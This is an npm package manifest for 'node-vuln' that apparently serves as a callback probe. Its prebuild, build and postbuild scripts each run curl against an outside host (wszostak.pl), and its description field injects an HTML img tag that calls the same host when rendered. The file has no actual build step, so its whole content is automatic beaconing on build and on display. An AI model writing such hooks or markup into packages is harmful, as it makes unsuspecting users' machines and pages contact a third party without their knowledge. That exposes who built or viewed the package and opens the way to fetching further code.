{
  "name": "node-vuln",
  "version": "1.0.0",
  "description": "<img src=\"https://wszostak.pl/x/s.php?npm\">",
  "scripts": {
    "prebuild": "curl https://wszostak.pl/x/s.php?npm-prb",
    "build": "curl https://wszostak.pl/x/s.php?npm-b",
    "postbuild": "curl https://wszostak.pl/x/s.php?npm-pob"
  }
}
